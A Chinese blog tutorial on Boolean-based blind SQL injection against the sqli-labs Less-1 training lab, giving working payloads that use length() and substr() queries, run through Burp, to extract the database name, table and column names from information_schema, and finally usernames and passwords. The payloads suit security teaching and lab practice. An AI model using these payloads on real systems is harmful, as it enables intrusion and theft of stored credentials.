Boolean注入攻击

作者: 原来是老王 | 来源:发表于2019-04-11 18:22 被阅读8次

Boolean注入攻击

爆库名

访问测试注入地址:http://192.168.1.118/sqli/Less-1/?id=1

and length(database())>=1


返回正常

and length(database())>=10


返回错误
利用返回正常,返回错误进行注入

注:有些杠精又要说我直接用union联合注入不就行了,我在这里说明一下,我教的是Boolean注入



利用burp去跑一下,发现9报错,那就表明库的字段长度为8

and substr(database(),1,1)='x'

继续利用burp爆破库名的第一位值



第一位为s
数据库名不区分大小
以此类推爆8次即可
数据库为:security

爆表名

and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='x'


表名第一位为e
以此类推
表名
emails
referers
uagents
users

爆列名

and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='x'


列名第一位为i
以此类推
列名
id
username
password

爆内容

and substr((select username from users limit 0,1),1,1)='x'

and substr((select password from users limit 0,1),1,1)='x'

有什么不懂的可以在下面留言

相关文章

网友评论

    本文标题:Boolean注入攻击

    本文链接:https://www.haomeiwen.com/subject/uijxwqtx.html